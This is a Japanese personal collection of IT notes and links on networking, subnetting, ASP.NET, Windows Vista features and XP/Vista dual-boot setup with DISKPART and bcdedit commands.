LAN間接続している場合って、どうなんだろう・・・
ニンテンドー DS を無線に参加させている環境は危険そうですね。
「秘密基地をつくろう!」のグリッターパネルだけ試す
http://journal.mycom.co.jp/articles/2006/12/20/gp/
これ、ログやパフォーマンスモニタと連動出来ないかなぁ。。。
うぉ、惜しい…お年玉貰えず。。。
リバース・プロキシ
リバース・プロキシについては
http://www.atmarkit.co.jp/icd/root/83/4832083.html
この辺りの記事を。
Web カメラを IIS を中継させて接続出来ないか調べてたんだけど。。。
・Microsoft ISA Srever 2006 を使う方法
http://www.microsoft.com/japan/isaserver/default.mspx
・Apache をインストールして、Apache の機能のリバースProxy を使う方法
http://www.apache.jp/
・DeleGate を使う方法
http://www.delegate.org/delegate/
って感じかなぁ…
HTTP_X_FORWARDED_FOR、HTTP_X_FORWARDED_HOST 辺りをいじって 単独で動かせないかなぁ、、、
Microsoft TechNet バーチャル ラボ: セキュリティ バーチャル ラボ公開
http://www.microsoft.com/japan/technet/traincert/virtuallab/security.mspx
で、Internet Security and Acceleration Server 2006 は触れるみたい。
関連っぽいような。。。
ユニバーサルな中間者攻撃(マン・イン・ザ・ミドル)フィッシング・キットを新たに発見
新キットは、より高度化かつ自動化された、不正行為者によるオンライン不正攻撃を助長
http://www.rsasecurity.co.jp/news/data/20070110.html
ダウンロード出来ないストリーム再生方法。(まぁしようと思えば出来るけど)
SSL を使って IE に貼り付けたメディアプレーヤで再生させる。
https から始まるアドレスでも IE に貼り付けてある場合はストリーム再生されます。
単体で起動して URL を入力した場合、https から始まる URL は再生できません。
あとは URLScan の設定で、AllowHighBitCharacters=0 にしておくとかで。
IIS6.0 + URLScan2.5 の環境下で確認。
あー、単純に WMV のマッピング削除して、スプリクトから再生するように書けば OK か...
Response.Redirect
あれ、、、別サーバへリダイレクトさせると、リファラーが無くなってる…
何時から通知されなくなったんだろう...
2007.4.13 確認したら拾えるようになってた。うむぅ。。。
IP Unnumbered と フレッツスクエアを同時に使う
・ルータを2つ用意
ルータ1
IP Unnumbered を設定
フレッツスクエア向けのルーティング情報追加
(10.0.0.0/8 を設定してゲートウェイをルータ2へ向ける)
ルータ2で、フレッツスクエアに接続する設定。
ルーティング情報は フレッツスクエアを利用する端末のみ設定しても構わない。
ルート情報の追加登録は
route /s add 10.0.0.0 mask 255.0.0.0 [ルータ2のゲートウェイアドレス] metric 1 if 1
route print で確認出来ます。
おまけ。
サブネットマスク(2進数) ビットマスク(CIDR) IPアドレス数
255.255.255.255(11111111.11111111.11111111.11111111)32 1(HOST を表す)
255.255.255.254(11111111.11111111.11111111.11111110)31 2(利用できない)
255.255.255.252(11111111.11111111.11111111.11111100)30 4
255.255.255.248(11111111.11111111.11111111.11111000)29 8
255.255.255.240(11111111.11111111.11111111.11110000)28 16
255.255.255.224(11111111.11111111.11111111.11100000)27 32
255.255.255.192(11111111.11111111.11111111.11000000)26 64
255.255.255.128(11111111.11111111.11111111.10000000)25 128
255.255.255.0 (11111111.11111111.11111111.00000000)24 256
255.255.254.0 (11111111.11111111.11111110.00000000)23 512
255.255.252.0 (11111111.11111111.11111100.00000000)22 1024
255.255.248.0 (11111111.11111111.11111000.00000000)21 2048
255.255.240.0 (11111111.11111111.11110000.00000000)20 4096
255.255.224.0 (11111111.11111111.11100000.00000000)19 8192
255.255.192.0 (11111111.11111111.11000000.00000000)18 16384
255.255.128.0 (11111111.11111111.10000000.00000000)17 32768
255.255.0.0 (11111111.11111111.00000000.00000000)16 65536
255.254.0.0 (11111111.11111110.00000000.00000000)15 131072
255.252.0.0 (11111111.11111100.00000000.00000000)14 262144
255.248.0.0 (11111111.11111000.00000000.00000000)13 524288
255.240.0.0 (11111111.11110000.00000000.00000000)12 1048576
255.224.0.0 (11111111.11100000.00000000.00000000)11 2097152
255.192.0.0 (11111111.11000000.00000000.00000000)10 4194304
255.128.0.0 (11111111.10000000.00000000.00000000) 9 8388608
255.0.0.0 (11111111.00000000.00000000.00000000) 8 16777216
254.0.0.0 (11111110.00000000.00000000.00000000) 7 33554432
252.0.0.0 (11111100.00000000.00000000.00000000) 6 67108864
248.0.0.0 (11111000.00000000.00000000.00000000) 5 134217728
240.0.0.0 (11110000.00000000.00000000.00000000) 4 268435456
224.0.0.0 (11100000.00000000.00000000.00000000) 3 536870912
192.0.0.0 (11000000.00000000.00000000.00000000) 2 1073741824
128.0.0.0 (10000000.00000000.00000000.00000000) 1 2147483648
0.0.0.0 (00000000.00000000.00000000.00000000) 0 4294967296
クラスA 0.0.0.0 - 127.255.255.255
クラスB 128.0.0.0 - 191.255.255.255
クラスC 192.0.0.0 - 223.255.255.255
クラスD 224.0.0.0 - 239.255.255.255
クラスE 240.0.0.0 - 255.255.255.255
プライベートIPアドレス(割り当て可能な範囲 RFC1918の規定による)
クラスA 10.0.0.0 - 10.255.255.255 /8
クラスB 172.16.0.0 - 172.31.255.255 /12
クラスC 192.168.0.0 - 192.168.255.255 /16
クラスC 192.168.0.0 を使った例
サブネットマスク 255.255.255.192
ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス
192.168.0.0 192.168.0.1 192.168.0.62 192.168.0.63
192.168.0.64 192.168.0.65 192.168.0.126 192.168.0.127
192.168.0.128 192.168.0.129 192.168.0.190 192.168.0.191
192.168.0.192 192.168.0.193 192.168.0.254 192.168.0.255
サブネットマスク 255.255.255.128
ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス
192.168.0.0 192.168.0.1 192.168.0.126 192.168.0.67
192.168.0.128 192.168.0.129 192.168.0.254 192.168.0.255
サブネットマスク 255.255.255.0
ネットワークアドレス 最小アドレス 最大アドレス ブロードキャストアドレス
192.168.0.0 192.168.0.1 192.168.0.254 192.168.0.255
あとで読む。
最新のインターネットAPサーバ「IIS 7.0」の実力を探る
http://www.itmedia.co.jp/enterprise/articles/0701/10/news001.html
Xbox 360で.NETとC#による自作ゲームを動かそう
http://www.atmarkit.co.jp/fdotnet/directxworld/xnaanniversary01/xnaanniversary01_01.html
Second Lifeの閲覧がソフトオープンソース化
http://journal.mycom.co.jp/news/2007/01/09/341.html
Windows管理者必携、Sysinternalsでシステムを把握
http://www.atmarkit.co.jp/fsecurity/column/ueno/43.html
なぜPHPアプリにセキュリティホールが多いのか? 第1回 CVEでみるPHPアプリケーションセキュリティ
http://gihyo.jp/serial/2007/php-security/0001
脆弱性を利用した攻撃手法(2) --- Webアプリケーションを突く攻撃
http://itpro.nikkeibp.co.jp/article/COLUMN/20070105/258101/
続々誕生する新種のネット依存症
http://www.yomiuri.co.jp/atmoney/yw/yw07012801.htm
インフォスフィア:「フレッツ」接続サービスがお得なキャンペーン!
http://www.sphere.ne.jp/b-special/index.html
な!現行ユーザは無視ですか、そうですか...
と、いう事で新規契約しなおしです。
IP アドレスが変更になりますが、まぁ問題ないでしょう・・・
新しいIPアドレス貰いました。
逆引きの委任アドレスが違ってるけど、まぁ後日修正で。。。
Windows Presentation Foundation (WPF)
“WPF/E” vs. Adobe Flash、ガチンコ対決!
http://www.atmarkit.co.jp/fdotnet/insiderseye/20061214wpfe01/wpfe010_01.html
WPF/EはUIの選択肢になるか
http://itpro.nikkeibp.co.jp/article/COLUMN/20061211/256568/
“WPF/E”開発を体験してみよう!
http://www.atmarkit.co.jp/fdotnet/insiderseye/20061221wpfe02/wpfe02_01.html
WPFを使う上でのQ&A
http://itpro.nikkeibp.co.jp/article/COLUMN/20061128/255168/
Windows Vistaソフトウェアコンテスト|WPFローカルアプリケーションについて
http://www.vistacon.jp/wpf_local/index.htm
Microsoft Windows Software Development Kit (SDK) for Beta 2 of Windows Vista and WinFX Runtime Components - (8 KB - 2343.8MB)
http://www.microsoft.com/downloads/details.aspx?FamilyId=13F8E273-F5EA-4B7B-B022-97755838DB94&displaylang=en
Virtual CD-ROM Control Panel for Windows XP (59.6K)
http://download.microsoft.com/download/7/b/6/7b6abd84-7841-4978-96f5-bd58df02efa2/winxpvirtualcdcontrolpanel_21.exe
Windows Vista デベロッパーセンター
http://www.microsoft.com/japan/msdn/windowsvista/
Windows サイドバー ガジェットの API リファレンス
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sidebar/sidebar/reference/refs.asp
“WPF/E” (codename) Community Technology Preview for Windows (Feb 2007)
http://www.microsoft.com/downloads/details.aspx?FamilyID=e63992d3-ccf5-40b9-b98a-d16bca57467c&DisplayLang=en
“WPF/E” (codename) Software Development Kit (SDK) Community Technology Preview (Feb 2007)
http://www.microsoft.com/downloads/details.aspx?FamilyID=c744cbb8-d4d9-4bf9-ad5c-eef36e064911&DisplayLang=en
“WPF/E” (codename) Community Technology Preview for Mac (Feb 2007)
http://www.microsoft.com/downloads/details.aspx?FamilyID=8b6b1524-ecd9-4ff2-bb0f-d9156f570c5b&DisplayLang=en
ASP.NET をまだ触った事が無いわけで、この機会にまとめて...
とりあえず、Visual Web Developer 2005 Express Editionをノート入れつつ
Expression Webを注文。
Microsoft Expression Web製品レビュー(前編)
http://www.atmarkit.co.jp/fdotnet/special/expressionweb01/expressionweb01_04.html
Microsoft Expression Web製品レビュー(後編)
http://www.atmarkit.co.jp/fdotnet/special/expressionweb02/expressionweb02_01.html
IEerBug
http://oss.moongift.jp/intro/i-3522.html
コンピュータにインストールされている .NET Framework のバージョンを調べる方法はありますか
http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0714.mspx
.NET Framework 2.0 が IIS で利用できない場合は
aspnet_regiis を使う。
ASP.NET のバージョンを表示する
ASP.NET インストールでのトラブルシューティング
ASP.NET
ASP から ASP.NET 2.0 への移行
ASP.NET 1.x から ASP.NET 2.0 への移行
ASP.NET における認証 : .NET セキュリティ ガイド
ASP.NET で System.DirectoryServices 名前空間を使用する方法
認証を委任する場合の ASP.NET アプリケーションの構成方法
Hiroyasu Kitagawa’s Blog : システム管理者のための.NET Framework
http://blogs.msdn.com/hiroyask/archive/2006/11/20/net-framework.aspx
.NET Framework 2.0 廃止予定の API 一覧
.NET Framework 3.0 環境構築
ASP.NET AJAX 1.0
連載 ASP.NET AJAXを理解する
第1回 ASP.NETはどのように“Ajax”と融合したのか?
http://www.atmarkit.co.jp/fdotnet/aspnetajax/aspnetajax01/aspnetajax01_01.html
第2回 ASP.NET AJAXを使いこなす
http://www.atmarkit.co.jp/fdotnet/aspnetajax/aspnetajax02/aspnetajax02_01.html
柔軟な.NET構成セクションハンドラ(.config)の作成
コンピュータにインストールされている .NET Framework のバージョンを調べる方法はありますか
http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/jul05/hey0712.mspx
現実に最も使える.NETのバージョンはどれ?
http://www.atmarkit.co.jp/fdotnet/chushin/opinion_dotnetversion/opinion_dotnetversion.html
Windowsでイントラ・ブログを構築する(前編)(@IT)
http://www.atmarkit.co.jp/fwin2k/operation/intrablog01/intrablog01_01.html
Windowsでイントラ・ブログを構築する(後編)
http://www.atmarkit.co.jp/fwin2k/operation/intrablog02/intrablog02_01.html
Web Matrixで始めるWebアプリ・プログラミング
第1回 オール・フリーなASP.NET統合開発環境
http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix01/webmatrix01_01.html
第2回 Web MatrixによるASP.NET開発の基礎
http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix02/webmatrix02_01.html
第3回 Web MatrixでWebアプリケーションを開発しよう
http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix03/webmatrix03_01.html
第4回 Web Matrix独自のサーバ・コントロールの活用
http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix04/webmatrix04_01.html
第5回 Web Matrixの開発支援機能を駆使する
http://www.atmarkit.co.jp/fdotnet/webmatrix/webmatrix05/webmatrix05_01.html
ASP.NET + Ajax
http://www.friendlysw.com/aspnet/aspnet.asp
GotDotNet Japan
http://www.gotdotnet.com/japan/
Microsoft ASP.NET クイック スタート チュートリアル
http://ja.gotdotnet.com/quickstart/aspplus/
Microsoft .NET Framework SDK クイック スタート チュートリアル
http://ja.gotdotnet.com/quickstart/default.aspx
テスト用途向け無償のASP.NET ホスティング
http://europe.webmatrixhosting.net/japan/default.aspx
ASP.NETアプリケーションの脆弱性を開発時から洗い出す分析ツール
http://www.itmedia.co.jp/enterprise/articles/0604/20/news084.html
Visual Studio 2005エディション比較
Professional? Standard? それともExpress?
http://www.atmarkit.co.jp/fdotnet/special/vs2005compare/vs2005compare_01.html
認証する: サイトの認証を ASP.NET 2.0 Membership API でアップグレードする
http://www.microsoft.com/japan/msdn/msdnmag/issues/05/11/Membership/
保護していますか: ASP.NET 2.0 と IIS 6.0 によるセキュア Web アプリケーションの設計と配置
http://www.microsoft.com/japan/msdn/msdnmag/issues/05/11/SecureWebApps/
プログラムコードと HTML コードを分離する方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/codebehind/
Cookie の設定と取得をする方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/Cookie/
How To: ASP.NET 2.0 で SQL Server とともにフォーム認証を使用する方法
http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000014.asp
How To: ASP.NET 2.0 の複数のドメイン内で Active Directory とともにフォーム認証を使用する方法
http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000021.asp
How To: ASP.NET 2.0 で Active Directory とともにフォーム認証を使用する方法
http://www.microsoft.com/japan/msdn/enterprise/pag/securityguidance/paght000026.asp
ファイルのダウンロード機能を実装する方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/download/
セッション変数の設定と取得をする方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/session/
ファイルのアップロード機能を実装する方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/upload/
Enter キーでの Submit を抑止する方法 - ASP.NET プログラミング Tips
http://www.microsoft.com/japan/msdn/asp.net/tips/enternosubmit/
.NET アプリケーション用に SQL Server のセキュリティを構成する方法
http://support.microsoft.com/kb/815154/ja
セキュリティ保護された ASP.NET アプリケーションの構築 : 認証、認定、および通信のセキュリティ保護
http://www.microsoft.com/japan/msdn/net/security/SecNetch12.aspx
.NETでエンタープライズ・アプリケーションはこう変わる
http://www.atmarkit.co.jp/fdotnet/entwebapp/entwebapp01/entwebapp01_01.html
ショッピング・サイト構築で学ぶASP.NET実践講座
http://www.atmarkit.co.jp/fdotnet/aspexp/aspexp01/aspexp01_01.html
ASP.NETがもたらす次世代のWebプログラミング
http://www.atmarkit.co.jp/fdotnet/aspnet/aspnet01/aspnet01_01.html
「ASP.NETってナニ?」と闘う!
http://www.atmarkit.co.jp/fdotnet/aspdevura/aspdevura01/aspdevura01_01.html
Windows Server 2003 上の IIS 6.0 での IIS 5 プロセス分離モード使用時に、ASP.NET 1.1 で ASPNET アカウントのプロセス ID を構成する方法
http://support.microsoft.com/kb/895967/ja
そろそろ ASP.NET って事で 2冊買ってみた。
10日でおぼえるASP.NET 2.0 入門教室 (大型本)
Microsoft Visual Studio 2005によるWebアプリケーション構築技法 (大型本)
クロスサイトスクリプティング対策用のライブラリ
Microsoft Anti-Cross Site Scripting Library V1.5
http://www.microsoft.com/downloads/details.aspx?FamilyId=EFB9C819-53FF-4F82-BFAF-E11625130C25&displaylang=en
Microsoft Anti-Cross Site Scripting Library V3.0 Beta
http://www.microsoft.com/downloads/details.aspx?FamilyID=051ee83c-5ccf-48ed-8463-02f56a6bfc09&DisplayLang=en
使い方はこの辺り http://msdn.microsoft.com/en-us/magazine/cc794277.aspx
脆弱性を確認できるバイナリ解析ツール
Microsoft Code Analysis Tool .NET (CAT.NET) v1 CTP - 64 bit
http://www.microsoft.com/downloads/details.aspx?FamilyID=e0052bba-2d50-4214-b65b-37e5ef44f146&DisplayLang=en
Web アプリケーション セキュリティ強化: 脅威とその対策
http://www.microsoft.com/japan/msdn/security/guidance/secmod89.mspx
ASP.NET AJAXでYahoo! ウェブ検索Webサービスを利用してみよう
http://itpro.nikkeibp.co.jp/article/COLUMN/20061121/254331/
..NET TIPS - .NET開発のテクニックとヒント集 -
http://www.atmarkit.co.jp/fdotnet/dotnettips/index/index.html
..NETのデータセットとデータテーブル
http://www.atmarkit.co.jp/fdotnet/vblab/vsdbprog_02/vsdbprog_02_01.html
見つけて得するソースコード専用の検索エンジン
http://www.atmarkit.co.jp/fjava/column/andoh/andoh33.html
Ajaxでデバッグしよう
http://www.atmarkit.co.jp/fwcr/special/ajax_debug/01.html
プログラマならWeb APIという巨人の力を使っちゃえ!
http://www.atmarkit.co.jp/fnetwork/rensai/5minapi/01.html
連載 .NETでモバイル・サイト開発を始めよう
http://www.atmarkit.co.jp/fdotnet/aspnetmobile/aspnetmobile01/aspnetmobile01_01.html
Visual Studio 2005によるWindowsデータベース・プログラミング
http://www.atmarkit.co.jp/fdotnet/vblab/vsdbprog_index/index.html
MS、グーグルなど32社がOpenAjaxに加入
http://www.atmarkit.co.jp/news/200703/23/ajax.html
うるう年の計算(グレゴリオ暦 1583年〜)
・西暦が 4 で割り切れる年はうるう年。
・4 で割り切れても、100 で割り切れる場合はうるう年ではない。
・100で割り切れても、400 で割り切れる場合はうるう年。
曜日の計算(ツェラーの公式)
曜日 = ( 年 + 年 / 4 - 年 / 100 + 年 / 400 + ( 13 * 月 + 8 ) / 5 + 日) % 7
この公式は 1月、2月を前年の 13月、14月として取り扱う。
最後に 7 で割った余りが 0 なら 日曜日、1なら 月曜日。
うるう年を判定する方法
http://support.microsoft.com/kb/214019/ja
生年月日から年齢を計算する簡単な計算式
http://nosa.cocolog-nifty.com/sanonosa/2007/06/post_1db2.html
(今日の日付-誕生日)/10000の小数点以下切捨て。
VISTA
Windows Vista Upgrade Advisor 1.0
http://www.microsoft.com/downloads/details.aspx?FamilyID=42b5ac83-c24f-4863-a389-3ffc194924f8&DisplayLang=ja
Windows XP 用 Windows 転送ツール
http://www.microsoft.com/downloads/details.aspx?FamilyID=2b6f1631-973a-45c7-a4ec-4928fa173266&DisplayLang=ja
Windows Vista 用の更新プログラム (KB932246)
http://www.microsoft.com/downloads/details.aspx?FamilyID=e529eeaa-10f2-44fd-bae1-89f395e71277&DisplayLang=ja
Microsoft® Windows® Software Development Kit Update for Windows Vista™
http://www.microsoft.com/downloads/details.aspx?familyid=ff6467e6-5bba-4bf5-b562-9199be864d29&displaylang=en
Windows Vista にアップグレードしたいが経営層が 「Windows XP で十分だ」 という!
http://www.microsoft.com/japan/business/enterpriseready/interview/nayami03.mspx
◆「Windows Vista」のアクティベーションはほぼ永久に先送り可能
http://itpro.nikkeibp.co.jp/article/NEWS/20070322/265876/
◆Windows Vistaのアクティベーションをクラックする新手法が登場
http://slashdot.jp/security/article.pl?sid=07/03/13/226247
◆Vistaの正規プロダクト・キーを割り出すツールが登場
http://www.computerworld.jp/news/sec/59570.html
◆Vista OENハッキングでアクティベーション回避
http://www.itmedia.co.jp/news/articles/0704/13/news029.html
7にも・・・
「Windows 7」のアクティベーション回避法が発見される
http://www.computerworld.jp/topics/win7/167889.html
◆Vistaのハードウェア要件
http://www.atmarkit.co.jp/fwin2k/vista_feature/05hardware/05hardware_01.html
◆Windows Vista SP1には「SSLベースのVPN機能」が標準搭載
http://itpro.nikkeibp.co.jp/article/COLUMN/20070221/262745/
◆Windows Vistaネットワーク完全ガイド
http://itpro.nikkeibp.co.jp/article/COLUMN/20070313/264787/
第1回 Vista時代の到来でネットワークは大きく変わる
http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264953/
第2回 ブロードバンド向けにTCP通信を強化
http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264966/
第3回 IPv6を前提に再設計NetBIOSなしでも動作する
http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264982/
第4回 管理者権限をOSで制限タスク・マネージャも改良
http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/265013/
・Vista では TCP/IP スタックが書き直され、その構造が大きく変わっています。
(デフォルトで IPv6 ですが特別、何かする必要は在りません)
・Windows Firewall も出力 (outbound) 方向のフィルタリングをサポートしています。
(デフォルトでは オフになっているようで設定方法は調査中)
・メールは Windows Mail となって スパムフィルタが実装されました。
Vista搭載の「Windows Mail」に脆弱性報告 http://www.itmedia.co.jp/news/articles/0703/26/news033.html
CRLF インジェクション っぽい。
・Windows Defender が標準で組み込まれています。
Windows Defender
http://www.microsoft.com/downloads/details.aspx?FamilyID=435bfce7-da2b-4a6a-afa4-f7f14e605a0d&DisplayLang=ja
(だからと言ってアンチウイルス製品が不要と言う訳ではありません)
Windows Vistaのセキュリティ機能、XPとはここが違う
第1回:知らぬ間の不正プログラム侵入を防ぐユーザーアカウント制御
http://internet.watch.impress.co.jp/static/vista/security/2007/03/01/index.html
第2回:PC盗難による情報漏洩を防ぐドライブ暗号化機能
http://internet.watch.impress.co.jp/static/vista/security/2007/03/07/index.html
指定したユーザーでローカル/リモートでプロセスを実行するツールとして
PsExec v1.82
http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx
Windows管理者必携、Sysinternalsでシステムを把握する
http://www.atmarkit.co.jp/fsecurity/column/ueno/43.html
◆第7回 管理者権限での実行を制限するユーザー・アカウント制御UAC(前編)
1.管理者権限で利用するWindows OS
http://www.atmarkit.co.jp/fwin2k/vista_feature/07uac01/07uac01_01.html
◆Windows Vistaに対する恐怖は、どうすれば取り除けるのか?
http://www.nikkeibp.co.jp/news/it07q2/530175/
◆Windows Vista体験ツアー(1)表示・操作編
http://pc.nikkeibp.co.jp/article/NPC/20070330/267023/
Windows Vista体験ツアー(2)設定編
http://pc.nikkeibp.co.jp/article/NPC/20070330/267025/
◆IPv6を取り込んだVistaのネットワーク機能
http://www.atmarkit.co.jp/fwin2k/vista_feature/10ipv6/10ipv6_01.html
◆「Windows Vistaのような高機能OSは必要ない?」,インフォプラント調査
http://www.nikkeibp.co.jp/news/manu07q1/528814/
◆Vista、個人での利用は0.9%、会社ではゼロ
http://japan.internet.com/research/20070307/1.html
◆Vistaから見るWeb2.0
http://www.itmedia.co.jp/enterprise/articles/0703/21/news012.html
◆【番外編】Vistaの快適度を「数値」で表示!
Windows エクスペリエンス インデックス26機種公開(週刊Vistaです!)
http://arena.nikkeibp.co.jp/col/20070315/121255/?from=mail
◆VistaとXPのデュアルブートでやってはいけないこと(週刊Vistaです!)
http://arena.nikkeibp.co.jp/col/20070319/121288/?from=mail
◆光と影が交錯? Vistaのネット環境
http://pc.nikkeibp.co.jp/article/NPC/20070313/264689/
◆Vista PCと手持ちのAV機器・素材ですぐデキる!写真・音楽・ビデオ300%活用法(特集)
http://arena.nikkeibp.co.jp/tokushu/gen/20070215/120892/
◆Vistaのロゴは頼りになるか?
http://pc.nikkeibp.co.jp/article/NPC/20070221/262753/
◆僕がWindows Vistaを見送った理由(デジタルな旅)
http://arena.nikkeibp.co.jp/col/20070308/121159/
◆Media Centerのライバルは「Wiiチャンネル」?(週刊Vistaです!)
http://arena.nikkeibp.co.jp/col/20070312/121202/
◆キラーガジェット登場はアプリ業界を再編――事例で見るLiveガジェット
http://www.itmedia.co.jp/enterprise/articles/0703/08/news004.html
◆Vista時代のWindowsアプリ・デザイン・ツール
http://www.atmarkit.co.jp/fdotnet/special/blend01/blend01_01.html
◆ガジェットで新しい仕事環境を作る
http://pc.nikkeibp.co.jp/article/NPC/20070329/266889/
◆「今どきのWebアプリは4時間で作られている」の理由
http://www.itmedia.co.jp/enterprise/articles/0703/30/news003.html
◆MSがVistaの検索機能の仕様変更を決断、年内にSP1のベータをリリース
http://pc.nikkeibp.co.jp/article/NEWS/20070621/275420/?ST=pc_news
◆Vista 使用者未だ1割に満たず〜自宅のパソコンに関する調査
http://japan.internet.com/research/20070619/1.html
◆「MCP教科書 Windows Vista(70-620)」
http://www.seshop.com/detail.asp?pid=7893
◆Microsoftの新たな報告書,「Windows VistaはMac OS XやLinuxよりも安全」!?
http://itpro.nikkeibp.co.jp/article/NEWS/20070626/275939/
◆セキュリティ強化を最大の“ウリ”にしたVistaの大誤算 Vista担当幹部、「セキュリティ機能の強化は、新OSへの移行理由にならなかった」とコメント
http://www.computerworld.jp/news/sec/88249.html
◆ビスタのメモリーは「2GB」が新標準?!
http://pc.nikkeibp.co.jp/article/NPC/20071121/287738/
◆【これだけは知っておきたい,Vistaのセキュリティ機能】
第2回 ユーザーアカウント制御で危険な操作を防ぐ
http://itpro.nikkeibp.co.jp/article/COLUMN/20071126/287939/?ST=security
●XP と VISTA のデュアルブート環境の構築
ドライブが複数ある場合は、OS の入ってない違うドライブを選択すれば OK ですが
ドライブが1台しか無い場合(ノート等)はそのままだと、デュアルブートを選べません
が、未割り当て領域を確保する事で可能になります。
VISTA の DVD から起動したら、「コンピュータを修復」を選択します。
(システム回復コンソールみたいなもの)
システム回復オプションガ起動したら、コマンドを起動し、次の手順を実行
X:\Sources>DISKPART
DISKPART> LIST DISK 「LIST DISK」と入力
Disk ### Status Size Free
-------- ---------------- ------ -------
* Disk 0 オンライン 127 GB 0 GB
ハードディスクが1台しか無い場合は Disk 0 になります。
(実際の画面を確認してないので多少違うかも)
DISKPART> SELECT DISK 0 「SELECT DISK 番号」と入力して操作対象を選択
DISKPART> LIST PARTITION 「LIST PARTITION」と入力して番号を確認
Partition ### Type Size Offset
------------- ---------- ------ -------
* Partition 1 プライマリ 127 GB 32 KB
パーティションが1つしかない場合は Partition 1 になります。
DISKPART> SELECT PARTITION 1 「SELECT PARTITION 番号」と入力して操作対象を選択
パーティション 1 が選択されました。
DISKPART> SHRINK MINIMUM=60000 「SHRINK MINIMUM=縮小サイズ」と入力(単位は MB でこの場合は60GB)
ボリュームは、次の方法で正常に縮小されました: 59GB
DISKPART> LIST DISK 「LIST DISK」と入力し、未割り当て(フリー)を確認
Disk ### Status Size Free
-------- ---------------- ------ -------
* Disk 0 オンライン 127 GB 59 GB
DISKPART> EXIT
DiskPart を終了しています...
X:\Sources>
再起動する事無く、この状態からセットアップを起動出来ます。
X:\Sources>D:\Setup.exe
●デュアルブートから VISTA を削除する手順
・ブートセレクタを Windows XP用に復元する
C ドライブに XP がインストールされている場合はアプティブパーティションが
C ドライブになっているのでブートセレクタが NT ローダを先に見るように変更
ブートセクタを書き換えるには「BOOTSECT.EXE」コマンドを利用します。
(VISTA の DVD の中の「BOOT」フォルダ内に格納されています)
1.XP から起動
2.VISTA の DVD の BOOT フォルダに移動し、次のコマンドを実行
BOOTSECT /NT52 ALL
これで次回起動時からは Windowsブートローダは起動しなくなり
NT ローダで起動するようになります。
また C ドライブ内に残っている VISTA の ブートマネージャ関連
は削除してしまっても問題ありません。
●デュアルブートから XP を削除する手順
・ブートマネージャから「以前のバージョンのWindows」を消す
1.VISTA から 管理者として実行でコマンドプロンプトを表示
2.bcdedit /delete {ntldr} /f を実行
3.XP がインストールされたドライブから不要なファイルを削除
XP がインストールされている ドライブにある「Bootmgr」「Boot」を削除
すると、立ち上がらなくなってしまいますので、うっかりフォーマットして
しまった時の事を考えて、VISTA がインストールされているドライブへ移しておきます。
VISTA の DVD から起動し、「コンピュータを修復する」をクリックして
「システム回復オプション」を表示
コマンドプロンプトからボリュームの構成を確認
X:\Sources>DISKPART
DISKPART> LIST VOLUME
DISKPART> EXIT
XP が 第1パーティションにインストールされていた場合は そこが Cドライブになる
コマンドプロンプトから dir c:\boot でbootフォルダが在るか確認してコピー
xcopy c:\bootmgr d:\ /h
mkdir d:\boot
xcopy c:\boot d:\boot\ /cherky
VISTA がインストールされているパーティションをアクティブにして
XP が入っていたドライブをフォーマット
X:\Sources>DISKPART
DISKPART> LIST DISK
DISKPART> SELECT DISK 0
DISKPART> LIST PARTITION 2
DISKPART> ACTIVE
DISKPART> SELECT PARTITION 1
DISKPART> FORMAT QUICK
DISKPART> EXIT
XP が別の物理ドライブに入っている場合は、この手順は不要で
「format d: /f:ntfs /q」コマンドでフォーマットすれば OK です。
※BIOS の設定でドライブ起動順をVISTA が先に来るように変更する
●VISTA に XP をぶち込んだ場合
Vista に限らず、Windows のデュアル/マルチブート環境を構築する際は
Windows のバージョンが古い物から順番にインストールするのが鉄則です。
この場合、VISTA は起動出来なくなります。
ブートセクタの復元方法
ブートセクタを書き換えるには「BOOTSECT.EXE」コマンドを利用します。
(VISTA の DVD の中の「BOOT」フォルダ内に格納されています)
1.XP から起動
2.VISTA の DVD の BOOT フォルダに移動し、次のコマンドを実行
BOOTSECT /NT60 ALL
3.Windows ブートマネージャに XP用のエントリを追加
bcdedit -create {ntldr} -d "Microsoft Windows XP"
bcdedit -set {ntldr} device partition=C:
bcdedit -set {ntldr} path \ntldr
bcdedit -displayorder {ntldr} -addlast
Windows Vista 用 Web サーバーの新機能
http://msdn.microsoft.com/msdnmag/issues/07/03/IIS7/default.aspx?loc=jp
Windows7
Windows.old フォルダを使用して Windows 7 ベースのコンピュータを以前の Windows インストールに復元する方法
【特集】〜インストールから設定・活用まで〜 すべてが分かるWindows 7大百科
デル、Windows 7のマルチタッチに対応した21.5型ワイドフルHDディスプレイ
MS,「Windows 7」をUSBドライブからインストール可能にするツールを提供
暗号化機能を活用する。
フォルダのプロパティを開いて、詳細設定の属性の詳細で
「内容を暗号化してデータをセキュリティで保護する」
にチェックを入れると利用できる。
活用する為に、フォルダとファイルのショートカットメニューに追加する
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
値の名前 : EncryptionContextMenu
値の型 : DWORD
値 : 1
エクスプローラ メニューに [暗号化の詳細] ボタンを追加
ファイル名.reg で以下を保存して実行
[HKEY_CLASSES_ROOT\*\Shell\Encrypt To User...\Command]
@="rundll32 efsadu.dll,AddUserToObject %1"
削除したユーザが暗号化したファイルの複合する。
回復エージェントを利用して予備の複合キーを持つユーザを用意しておく。
